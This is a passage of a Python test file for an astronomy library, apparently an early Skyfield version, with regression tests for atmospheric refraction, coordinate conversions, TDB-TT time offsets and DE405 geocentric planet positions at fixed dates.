r = earthlib.refraction(-5, 10, 1013.25)
compare(r, 0.0, 0.001 * arcsecond)
def test_refraction2():
r = earthlib.refraction(-5, 25, 1010)
compare(r, 0.0, 0.001 * arcsecond)
def test_refraction3():
r = earthlib.refraction(-5, 25, 1013.25)
compare(r, 0.0, 0.001 * arcsecond)
def test_refraction4():
r = earthlib.refraction(-1, 10, 1010)
compare(r, 0.8296919418249878, 0.001 * arcsecond)
def test_refraction5():
r = earthlib.refraction(-1, 10, 1013.25)
compare(r, 0.8323617426278902, 0.001 * arcsecond)
def test_refraction6():
r = earthlib.refraction(-1, 25, 1010)
compare(r, 0.7879289246190321, 0.001 * arcsecond)
def test_refraction7():
r = earthlib.refraction(-1, 25, 1013.25)
compare(r, 0.7904643394754796, 0.001 * arcsecond)
def test_refraction8():
r = earthlib.refraction(15, 10, 1010)
compare(r, 0.06056215494995108, 0.001 * arcsecond)
def test_refraction9():
r = earthlib.refraction(15, 10, 1013.25)
compare(r, 0.06075703317132469, 0.001 * arcsecond)
def test_refraction10():
r = earthlib.refraction(15, 25, 1010)
compare(r, 0.057513724331664955, 0.001 * arcsecond)
def test_refraction11():
r = earthlib.refraction(15, 25, 1013.25)
compare(r, 0.057698793246593584, 0.001 * arcsecond)
def test_refraction12():
r = earthlib.refraction(89.95, 10, 1010)
compare(r, 0.0, 0.001 * arcsecond)
def test_refraction13():
r = earthlib.refraction(89.95, 10, 1013.25)
compare(r, 0.0, 0.001 * arcsecond)
def test_refraction14():
r = earthlib.refraction(89.95, 25, 1010)
compare(r, 0.0, 0.001 * arcsecond)
def test_refraction15():
r = earthlib.refraction(89.95, 25, 1013.25)
compare(r, 0.0, 0.001 * arcsecond)
def test_refract0():
alt = earthlib.refract(-90, 10.0, 1010.0)
compare(alt, -90.0, 0.000000001 * arcsecond)
def test_refract1():
alt = earthlib.refract(-2, 10.0, 1010.0)
compare(alt, -2.0, 0.000000001 * arcsecond)
def test_refract2():
alt = earthlib.refract(-1, 10.0, 1010.0)
compare(alt, -0.34540033564054795, 0.000000001 * arcsecond)
def test_refract3():
alt = earthlib.refract(0, 10.0, 1010.0)
compare(alt, 0.4819388815393779, 0.000000001 * arcsecond)
def test_refract4():
alt = earthlib.refract(1, 10.0, 1010.0)
compare(alt, 1.362447444478633, 0.000000001 * arcsecond)
def test_refract5():
alt = earthlib.refract(3, 10.0, 1010.0)
compare(alt, 3.227564692764261, 0.000000001 * arcsecond)
def test_refract6():
alt = earthlib.refract(9, 10.0, 1010.0)
compare(alt, 9.098059272393698, 0.000000001 * arcsecond)
def test_refract7():
alt = earthlib.refract(90, 10.0, 1010.0)
compare(alt, 90.0, 0.000000001 * arcsecond)
def test_from_altaz_0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos(
'38.9215 N', '77.0669 W', elevation_m=92.0)
a = usno(jd).from_altaz(alt_degrees=68.12871390985244, az_degrees=28.979244220884173)
ra, dec, distance = a.radec(epoch=jd)
compare(ra.hours, 12.34, 0.000000001 * arcsecond)
compare(dec.degrees, 56.78, 0.000000001 * arcsecond)
def test_from_altaz_1():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos(
'38.9215 N', '77.0669 W', elevation_m=92.0)
a = usno(jd).from_altaz(alt_degrees=-17.792497521318964, az_degrees=172.51742180816711)
ra, dec, distance = a.radec(epoch=jd)
compare(ra.hours, 12.34, 0.000000001 * arcsecond)
compare(dec.degrees, -67.89, 0.000000001 * arcsecond)
def test_from_altaz_2():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos(
'38.9215 N', '77.0669 W', elevation_m=92.0)
a = usno(jd).from_altaz(alt_degrees=65.8650913573598, az_degrees=34.158756360615946)
ra, dec, distance = a.radec(epoch=jd)
compare(ra.hours, 12.34, 0.000000001 * arcsecond)
compare(dec.degrees, 56.78, 0.000000001 * arcsecond)
def test_from_altaz_3():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos(
'38.9215 N', '77.0669 W', elevation_m=92.0)
a = usno(jd).from_altaz(alt_degrees=-18.43186389552551, az_degrees=170.42969631720953)
ra, dec, distance = a.radec(epoch=jd)
compare(ra.hours, 12.34, 0.000000001 * arcsecond)
compare(dec.degrees, -67.89, 0.000000001 * arcsecond)
def test_from_altaz_4():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos(
'38.9215 N', '77.0669 W', elevation_m=92.0)
a = usno(jd).from_altaz(alt_degrees=68.47898348962792, az_degrees=332.05109419434154)
ra, dec, distance = a.radec(epoch=jd)
compare(ra.hours, 12.34, 0.000000001 * arcsecond)
compare(dec.degrees, 56.78, 0.000000001 * arcsecond)
def test_from_altaz_5():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos(
'38.9215 N', '77.0669 W', elevation_m=92.0)
a = usno(jd).from_altaz(alt_degrees=-17.699091955922242, az_degrees=187.12243108963492)
ra, dec, distance = a.radec(epoch=jd)
compare(ra.hours, 12.34, 0.000000001 * arcsecond)
compare(dec.degrees, -67.89, 0.000000001 * arcsecond)
def test_from_altaz_6():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos(
'38.9215 N', '77.0669 W', elevation_m=92.0)
a = usno(jd).from_altaz(alt_degrees=41.36529829114181, az_degrees=316.19259712235026)
ra, dec, distance = a.radec(epoch=jd)
compare(ra.hours, 12.34, 0.000000001 * arcsecond)
compare(dec.degrees, 56.78, 0.000000001 * arcsecond)
def test_from_altaz_7():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos(
'38.9215 N', '77.0669 W', elevation_m=92.0)
a = usno(jd).from_altaz(alt_degrees=-29.282626410822033, az_degrees=204.1557062303077)
ra, dec, distance = a.radec(epoch=jd)
compare(ra.hours, 12.34, 0.000000001 * arcsecond)
compare(dec.degrees, -67.89, 0.000000001 * arcsecond)
def test_ITRF_to_GCRS_conversion_on_date0():
jd = JulianDate(tt=2440423.345833333, delta_t=39.707)
position = positionlib.ITRF_to_GCRS(jd, [1.1, 1.2, 1.3])
compare(position, (0.5701172053658128, -1.5232987806096392, 1.3017400651201707), 1e-13)
def test_ITRF_to_GCRS_conversion_on_date1():
jd = JulianDate(tt=2448031.5, delta_t=57.1136)
position = positionlib.ITRF_to_GCRS(jd, [1.1, 1.2, 1.3])
compare(position, (0.41362649279562963, -1.5741081933652488, 1.3004216700893525), 1e-13)
def test_ITRF_to_GCRS_conversion_on_date2():
jd = JulianDate(tt=2451545.0, delta_t=63.8285)
position = positionlib.ITRF_to_GCRS(jd, [1.1, 1.2, 1.3])
compare(position, (1.3757008573963405, -0.8702954291925735, 1.3000126987400913), 1e-13)
def test_ITRF_to_GCRS_conversion_on_date3():
jd = JulianDate(tt=2456164.5, delta_t=66.7846)
position = positionlib.ITRF_to_GCRS(jd, [1.1, 1.2, 1.3])
compare(position, (1.5243574049688486, 0.5755748855663746, 1.2980940077752074), 1e-13)
def test_tdb_minus_tt_on_date0():
result = timelib.tdb_minus_tt(2440423.345833333)
compare(result, -0.00046798717637519603, 1e-16)
def test_tdb_minus_tt_on_date1():
result = timelib.tdb_minus_tt(2448031.5)
compare(result, 0.0011585185926349208, 1e-16)
def test_tdb_minus_tt_on_date2():
result = timelib.tdb_minus_tt(2451545.0)
compare(result, -9.575743486095212e-05, 1e-16)
def test_tdb_minus_tt_on_date3():
result = timelib.tdb_minus_tt(2456164.5)
compare(result, -0.001241030165936046, 1e-16)
def test_mercury_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
distance = length_of((e - de405.mercury(jd)).position.au)
compare(distance * OLD_AU, 1.3278115470600746, 0.5 * meter)
astrometric = e.observe(de405.mercury)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 7.905384000977572, 0.001 * ra_arcsecond)
compare(dec.degrees, 22.332364359841474, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 7.904987228126012, 0.001 * ra_arcsecond)
compare(dec.degrees, 22.333433087908823, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 7.874971625095716, 0.001 * ra_arcsecond)
compare(dec.degrees, 22.415970392044656, 0.001 * arcsecond)
def test_mercury_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
distance = length_of((e - de405.mercury(jd)).position.au)
compare(distance * OLD_AU, 0.6507044512046538, 0.5 * meter)
astrometric = e.observe(de405.mercury)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 2.4704717994133576, 0.001 * ra_arcsecond)
compare(dec.degrees, 11.2501328449305, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 2.4701282535729665, 0.001 * ra_arcsecond)
compare(dec.degrees, 11.248550502940756, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 2.4616767226464757, 0.001 * ra_arcsecond)
compare(dec.degrees, 11.207785493244957, 0.001 * arcsecond)
def test_mercury_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
distance = length_of((e - de405.mercury(jd)).position.au)
compare(distance * OLD_AU, 1.4155249674526948, 0.5 * meter)
astrometric = e.observe(de405.mercury)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 18.13892977357885, 0.001 * ra_arcsecond)
compare(dec.degrees, -24.42032494108073, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 18.13851035907211, 0.001 * ra_arcsecond)
compare(dec.degrees, -24.420393338459686, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 18.138225455402914, 0.001 * ra_arcsecond)
compare(dec.degrees, -24.418845803732086, 0.001 * arcsecond)
def test_mercury_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
distance = length_of((e - de405.mercury(jd)).position.au)
compare(distance * OLD_AU, 1.1264323486728112, 0.5 * meter)
astrometric = e.observe(de405.mercury)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 9.295934662566733, 0.001 * ra_arcsecond)
compare(dec.degrees, 16.68579742896488, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 9.295575039086721, 0.001 * ra_arcsecond)
compare(dec.degrees, 16.687409731964937, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 9.307566088097714, 0.001 * ra_arcsecond)
compare(dec.degrees, 16.631743449679668, 0.001 * arcsecond)
def test_mercury_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
distance = length_of((e - de405.mercury(jd)).position.au)
compare(distance * OLD_AU, (1.3278115470600746, 0.6507044512046538, 1.4155249674526948, 1.1264323486728112), 0.5 * meter)
astrometric = e.observe(de405.mercury)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (7.905384000977572, 2.4704717994133576, 18.13892977357885, 9.295934662566733), 0.001 * ra_arcsecond)
compare(dec.degrees, (22.332364359841474, 11.2501328449305, -24.42032494108073, 16.68579742896488), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (7.904987228126012, 2.4701282535729665, 18.13851035907211, 9.295575039086721), 0.001 * ra_arcsecond)
compare(dec.degrees, (22.333433087908823, 11.248550502940756, -24.420393338459686, 16.687409731964937), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (7.874971625095716, 2.4616767226464757, 18.138225455402914, 9.307566088097714), 0.001 * ra_arcsecond)
compare(dec.degrees, (22.415970392044656, 11.207785493244957, -24.418845803732086, 16.631743449679668), 0.001 * arcsecond)
def test_venus_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
distance = length_of((e - de405.venus(jd)).position.au)
compare(distance * OLD_AU, 0.9646045654448725, 0.5 * meter)
astrometric = e.observe(de405.venus)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 4.966946050917652, 0.001 * ra_arcsecond)
compare(dec.degrees, 20.210417323471006, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 4.966656139420439, 0.001 * ra_arcsecond)
compare(dec.degrees, 20.210145917097474, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 4.93668626355443, 0.001 * ra_arcsecond)
compare(dec.degrees, 20.166644671858105, 0.001 * arcsecond)
def test_venus_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
distance = length_of((e - de405.venus(jd)).position.au)
compare(distance * OLD_AU, 1.0711674186789975, 0.5 * meter)
astrometric = e.observe(de405.venus)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 1.161811406279447, 0.001 * ra_arcsecond)
compare(dec.degrees, 5.32829157368082, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 1.1615415906820667, 0.001 * ra_arcsecond)
compare(dec.degrees, 5.326768071513868, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 1.1534174784892788, 0.001 * ra_arcsecond)
compare(dec.degrees, 5.277365365528824, 0.001 * arcsecond)
def test_venus_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
distance = length_of((e - de405.venus(jd)).position.au)
compare(distance * OLD_AU, 1.1376890757925104, 0.5 * meter)
astrometric = e.observe(de405.venus)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 15.993350650200568, 0.001 * ra_arcsecond)
compare(dec.degrees, -18.451653207795236, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 15.993038357924485, 0.001 * ra_arcsecond)
compare(dec.degrees, -18.450881488018126, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 15.992790109710333, 0.001 * ra_arcsecond)
compare(dec.degrees, -18.44871897642583, 0.001 * arcsecond)
def test_venus_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
distance = length_of((e - de405.venus(jd)).position.au)
compare(distance * OLD_AU, 0.7824924286112764, 0.5 * meter)
astrometric = e.observe(de405.venus)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 7.175585125577371, 0.001 * ra_arcsecond)
compare(dec.degrees, 19.874130272238094, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 7.175312328808404, 0.001 * ra_arcsecond)
compare(dec.degrees, 19.87477997549141, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 7.188033727750362, 0.001 * ra_arcsecond)
compare(dec.degrees, 19.85167856390226, 0.001 * arcsecond)
def test_venus_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
distance = length_of((e - de405.venus(jd)).position.au)
compare(distance * OLD_AU, (0.9646045654448725, 1.0711674186789975, 1.1376890757925104, 0.7824924286112764), 0.5 * meter)
astrometric = e.observe(de405.venus)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (4.966946050917652, 1.161811406279447, 15.993350650200568, 7.175585125577371), 0.001 * ra_arcsecond)
compare(dec.degrees, (20.210417323471006, 5.32829157368082, -18.451653207795236, 19.874130272238094), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (4.966656139420439, 1.1615415906820667, 15.993038357924485, 7.175312328808404), 0.001 * ra_arcsecond)
compare(dec.degrees, (20.210145917097474, 5.326768071513868, -18.450881488018126, 19.87477997549141), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (4.93668626355443, 1.1534174784892788, 15.992790109710333, 7.188033727750362), 0.001 * ra_arcsecond)
compare(dec.degrees, (20.166644671858105, 5.277365365528824, -18.44871897642583, 19.85167856390226), 0.001 * arcsecond)
def test_mars_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
distance = length_of((e - de405.mars(jd)).position.au)
compare(distance * OLD_AU, 0.5912188976380217, 0.5 * meter)
astrometric = e.observe(de405.mars)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 16.0296606272219, 0.001 * ra_arcsecond)
compare(dec.degrees, -24.127310308581468, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 16.02988433983068, 0.001 * ra_arcsecond)
compare(dec.degrees, -24.128202621801755, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 15.99950982315885, 0.001 * ra_arcsecond)
compare(dec.degrees, -24.046277103674843, 0.001 * arcsecond)
def test_mars_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
distance = length_of((e - de405.mars(jd)).position.au)
compare(distance * OLD_AU, 1.430250679602913, 0.5 * meter)
astrometric = e.observe(de405.mars)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 23.545034875459514, 0.001 * ra_arcsecond)
compare(dec.degrees, -4.8822490432210355, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 23.544892038854186, 0.001 * ra_arcsecond)
compare(dec.degrees, -4.88299363089811, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 23.536847630733252, 0.001 * ra_arcsecond)
compare(dec.degrees, -4.935089760397492, 0.001 * arcsecond)
def test_mars_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
distance = length_of((e - de405.mars(jd)).position.au)
compare(distance * OLD_AU, 1.8496039270835372, 0.5 * meter)
astrometric = e.observe(de405.mars)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 22.034936616343344, 0.001 * ra_arcsecond)
compare(dec.degrees, -13.18070741103498, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 22.03468760932384, 0.001 * ra_arcsecond)
compare(dec.degrees, -13.182134899635477, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 22.034417492807563, 0.001 * ra_arcsecond)
compare(dec.degrees, -13.182689288940116, 0.001 * arcsecond)
def test_mars_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
distance = length_of((e - de405.mars(jd)).position.au)
compare(distance * OLD_AU, 1.7665523168668773, 0.5 * meter)
astrometric = e.observe(de405.mars)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 13.894324196598355, 0.001 * ra_arcsecond)
compare(dec.degrees, -12.122808318928707, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 13.894132382683363, 0.001 * ra_arcsecond)
compare(dec.degrees, -12.121796956140246, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 13.9057161859901, 0.001 * ra_arcsecond)
compare(dec.degrees, -12.184654273116957, 0.001 * arcsecond)
def test_mars_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
distance = length_of((e - de405.mars(jd)).position.au)
compare(distance * OLD_AU, (0.5912188976380217, 1.430250679602913, 1.8496039270835372, 1.7665523168668773), 0.5 * meter)
astrometric = e.observe(de405.mars)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (16.0296606272219, 23.545034875459514, 22.034936616343344, 13.894324196598355), 0.001 * ra_arcsecond)
compare(dec.degrees, (-24.127310308581468, -4.8822490432210355, -13.18070741103498, -12.122808318928707), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (16.02988433983068, 23.544892038854186, 22.03468760932384, 13.894132382683363), 0.001 * ra_arcsecond)
compare(dec.degrees, (-24.128202621801755, -4.88299363089811, -13.182134899635477, -12.121796956140246), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (15.99950982315885, 23.536847630733252, 22.034417492807563, 13.9057161859901), 0.001 * ra_arcsecond)
compare(dec.degrees, (-24.046277103674843, -4.935089760397492, -13.182689288940116, -12.184654273116957), 0.001 * arcsecond)
def test_jupiter_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
distance = length_of((e - de405.jupiter(jd)).position.au)
compare(distance * OLD_AU, 5.8416003192317465, 0.5 * meter)
astrometric = e.observe(de405.jupiter)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 12.104091505864654, 0.001 * ra_arcsecond)
compare(dec.degrees, 0.6513409058207986, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 12.103936313614676, 0.001 * ra_arcsecond)
compare(dec.degrees, 0.6524656208782568, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 12.07798204538282, 0.001 * ra_arcsecond)
compare(dec.degrees, 0.8216129394812305, 0.001 * arcsecond)
def test_jupiter_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
distance = length_of((e - de405.jupiter(jd)).position.au)
compare(distance * OLD_AU, 5.913287883102948, 0.5 * meter)
astrometric = e.observe(de405.jupiter)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 6.765154678701348, 0.001 * ra_arcsecond)
compare(dec.degrees, 23.170397700122013, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 6.764854244708427, 0.001 * ra_arcsecond)
compare(dec.degrees, 23.170736332068763, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 6.755383083025232, 0.001 * ra_arcsecond)
compare(dec.degrees, 23.182684693676578, 0.001 * arcsecond)
def test_jupiter_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
distance = length_of((e - de405.jupiter(jd)).position.au)
compare(distance * OLD_AU, 4.621126565890217, 0.5 * meter)
astrometric = e.observe(de405.jupiter)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 1.5913207023268698, 0.001 * ra_arcsecond)
compare(dec.degrees, 8.595887646396902, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 1.5914167941833441, 0.001 * ra_arcsecond)
compare(dec.degrees, 8.59631203599914, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 1.5911888424331277, 0.001 * ra_arcsecond)
compare(dec.degrees, 8.594250857972387, 0.001 * arcsecond)
def test_jupiter_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
distance = length_of((e - de405.jupiter(jd)).position.au)
compare(distance * OLD_AU, 5.129958529243068, 0.5 * meter)
astrometric = e.observe(de405.jupiter)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 4.822841055032964, 0.001 * ra_arcsecond)
compare(dec.degrees, 21.649994488649476, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 4.822764769132736, 0.001 * ra_arcsecond)
compare(dec.degrees, 21.64994169521302, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 4.835670404865468, 0.001 * ra_arcsecond)
compare(dec.degrees, 21.67058638943795, 0.001 * arcsecond)
def test_jupiter_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
distance = length_of((e - de405.jupiter(jd)).position.au)
compare(distance * OLD_AU, (5.8416003192317465, 5.913287883102948, 4.621126565890217, 5.129958529243068), 0.5 * meter)
astrometric = e.observe(de405.jupiter)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (12.104091505864654, 6.765154678701348, 1.5913207023268698, 4.822841055032964), 0.001 * ra_arcsecond)
compare(dec.degrees, (0.6513409058207986, 23.170397700122013, 8.595887646396902, 21.649994488649476), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (12.103936313614676, 6.764854244708427, 1.5914167941833441, 4.822764769132736), 0.001 * ra_arcsecond)
compare(dec.degrees, (0.6524656208782568, 23.170736332068763, 8.59631203599914, 21.64994169521302), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (12.07798204538282, 6.755383083025232, 1.5911888424331277, 4.835670404865468), 0.001 * ra_arcsecond)
compare(dec.degrees, (0.8216129394812305, 23.182684693676578, 8.594250857972387, 21.67058638943795), 0.001 * arcsecond)
def test_saturn_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
distance = length_of((e - de405.saturn(jd)).position.au)
compare(distance * OLD_AU, 9.382032444401025, 0.5 * meter)
astrometric = e.observe(de405.saturn)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 2.4627748852420206, 0.001 * ra_arcsecond)
compare(dec.degrees, 12.045819985925936, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 2.462707593703528, 0.001 * ra_arcsecond)
compare(dec.degrees, 12.045735497802628, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 2.4352879582290177, 0.001 * ra_arcsecond)
compare(dec.degrees, 11.9115661075769, 0.001 * arcsecond)
def test_saturn_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
distance = length_of((e - de405.saturn(jd)).position.au)
compare(distance * OLD_AU, 9.420484451056101, 0.5 * meter)
astrometric = e.observe(de405.saturn)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 19.814248756112033, 0.001 * ra_arcsecond)
compare(dec.degrees, -20.933390198050763, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 19.81446344451556, 0.001 * ra_arcsecond)
compare(dec.degrees, -20.932846451357463, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 19.805277718955743, 0.001 * ra_arcsecond)
compare(dec.degrees, -20.958164640919687, 0.001 * arcsecond)
def test_saturn_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
distance = length_of((e - de405.saturn(jd)).position.au)
compare(distance * OLD_AU, 8.652750126001484, 0.5 * meter)
astrometric = e.observe(de405.saturn)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 2.584400980536592, 0.001 * ra_arcsecond)
compare(dec.degrees, 12.616288735770384, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 2.584593321351076, 0.001 * ra_arcsecond)
compare(dec.degrees, 12.616983167644802, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 2.584361121508456, 0.001 * ra_arcsecond)
compare(dec.degrees, 12.614774672730574, 0.001 * arcsecond)
def test_saturn_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
distance = length_of((e - de405.saturn(jd)).position.au)
compare(distance * OLD_AU, 10.326368974662916, 0.5 * meter)
astrometric = e.observe(de405.saturn)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 13.628484577191722, 0.001 * ra_arcsecond)
compare(dec.degrees, -7.659435207931653, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 13.62827504244793, 0.001 * ra_arcsecond)
compare(dec.degrees, -7.658028344724226, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 13.639628746850631, 0.001 * ra_arcsecond)
compare(dec.degrees, -7.723201642102626, 0.001 * arcsecond)
def test_saturn_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
distance = length_of((e - de405.saturn(jd)).position.au)
compare(distance * OLD_AU, (9.382032444401025, 9.420484451056101, 8.652750126001484, 10.326368974662916), 0.5 * meter)
astrometric = e.observe(de405.saturn)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (2.4627748852420206, 19.814248756112033, 2.584400980536592, 13.628484577191722), 0.001 * ra_arcsecond)
compare(dec.degrees, (12.045819985925936, -20.933390198050763, 12.616288735770384, -7.659435207931653), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (2.462707593703528, 19.81446344451556, 2.584593321351076, 13.62827504244793), 0.001 * ra_arcsecond)
compare(dec.degrees, (12.045735497802628, -20.932846451357463, 12.616983167644802, -7.658028344724226), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (2.4352879582290177, 19.805277718955743, 2.584361121508456, 13.639628746850631), 0.001 * ra_arcsecond)
compare(dec.degrees, (11.9115661075769, -20.958164640919687, 12.614774672730574, -7.723201642102626), 0.001 * arcsecond)
def test_uranus_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
distance = length_of((e - de405.uranus(jd)).position.au)
compare(distance * OLD_AU, 18.75197906203834, 0.5 * meter)
astrometric = e.observe(de405.uranus)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 12.087167068351334, 0.001 * ra_arcsecond)
compare(dec.degrees, 0.20723926118363256, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 12.087010426255667, 0.001 * ra_arcsecond)
compare(dec.degrees, 0.20832526777272883, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
